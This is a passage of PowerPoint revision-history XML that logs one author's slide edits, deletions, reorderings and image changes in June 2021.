      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T14:47:52.801" v="4" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1325061211" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T14:47:52.801" v="4" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1325061211" sldId="256"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T21:52:28.910" v="846"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2789471632" sldId="392"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:48:46.530" v="1299" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3672303902" sldId="393"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T23:00:52.837" v="1447" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2467691949" sldId="394"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:58:00.750" v="1430" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="3" creationId="{76E1B39B-59AC-4EE1-87FD-39C3199A948A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:58:48.988" v="1441" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="8" creationId="{A2208B58-0E66-44D6-BA81-6687A0D72552}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="12"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14"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17"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22" creationId="{16115475-8B62-47B5-80A6-1F1F393306CC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="29"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34"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35" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="36" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T23:00:52.837" v="1447" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:picMk id="6" creationId="{E56ACD9C-686E-43F4-A55E-E9A1ED1633C5}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:picMk id="10"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11"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13"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27"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28" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:picMk id="37" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:cxnSpMk id="5" creationId="{1F1BDC6F-E7B5-486D-95CC-DE84EDF5B973}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:cxnSpMk id="15" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:cxnSpMk id="16" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:cxnSpMk id="23" creationId="{13BA38A7-EB2B-409D-9F20-58122B90E850}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:cxnSpMk id="32" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:14:59.793" v="1894" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1030962794" sldId="395"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:50:05.180" v="1985" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1635951812" sldId="396"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:58:11.629" v="1431" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3476957671" sldId="397"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:49:35.593" v="1978" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="837580508" sldId="398"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:49:39.424" v="1979" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="775249280" sldId="399"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:49:43.824" v="1980" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="614667185" sldId="400"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:56:44.305" v="2061" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3582893092" sldId="401"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:11:44.390" v="2138" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="819433619" sldId="402"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:56:41.092" v="2060" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="39788097" sldId="403"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:11:36.173" v="2137"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3665038014" sldId="404"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:02:18.937" v="2126" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="464350271" sldId="405"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:01:07.195" v="2110" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="464350271" sldId="405"/>
            <ac:picMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:11:45.380" v="2139" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2093752077" sldId="406"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:11:57.502" v="2143" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1972666229" sldId="407"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:11:59.125" v="2144" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2980641166" sldId="408"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:12:01.142" v="2145" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3277870470" sldId="409"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:13:03.364" v="2149" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3881480386" sldId="413"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:55:00.563" v="2411" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3118374455" sldId="414"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:55:00.563" v="2411" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3118374455" sldId="414"/>
            <ac:picMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:12:04.673" v="2146" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="214186708" sldId="415"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:02:44.507" v="2128" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4266318337" sldId="416"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:02:44.507" v="2128" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4266318337" sldId="416"/>
            <ac:picMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:56:53.240" v="2063" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1453023660" sldId="417"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:13:52.471" v="2156" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4247754591" sldId="418"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:13:52.471" v="2156" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4247754591" sldId="418"/>
            <ac:picMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:11:49.338" v="2140" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1871513867" sldId="419"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T21:52:48.206" v="847" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4160866766" sldId="420"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T21:52:50.831" v="848" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1090587346" sldId="421"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:56:37.985" v="1425" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2079099636" sldId="422"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:56:46.417" v="1426" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1881823739" sldId="423"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:49:46.281" v="1981" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3519466523" sldId="424"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:49:48.168" v="1982" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2940456927" sldId="425"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:49:51.829" v="1983" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3876190788" sldId="426"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:16:02.081" v="2190" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2709397411" sldId="427"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:15:13.052" v="1895" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="647302650" sldId="428"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:14:55.307" v="1893" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="878272104" sldId="429"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T19:32:08.997" v="2634" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="593614233" sldId="431"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T19:32:08.997" v="2634" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="593614233" sldId="431"/>
            <ac:spMk id="5" creationId="{AA7D2DDE-BF6D-459D-9188-84B17B477993}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:11:50.006" v="2141" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="996485528" sldId="432"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:11:54.047" v="2142" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="848404907" sldId="433"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:47:11.504" v="2395"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2829655940" sldId="434"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:16:02.305" v="2191" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3752964083" sldId="435"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:16:02.553" v="2192" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3503932430" sldId="436"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:16:11.058" v="2193" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1984469485" sldId="437"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:16:15.817" v="2195" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4198334412" sldId="438"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T19:33:25.142" v="2640" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4105321355" sldId="439"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T19:33:25.142" v="2640" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4105321355" sldId="439"/>
            <ac:picMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:16:17.424" v="2196" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4192281943" sldId="439"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="delSp add mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T19:33:34.827" v="2641" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1827660371" sldId="440"/>
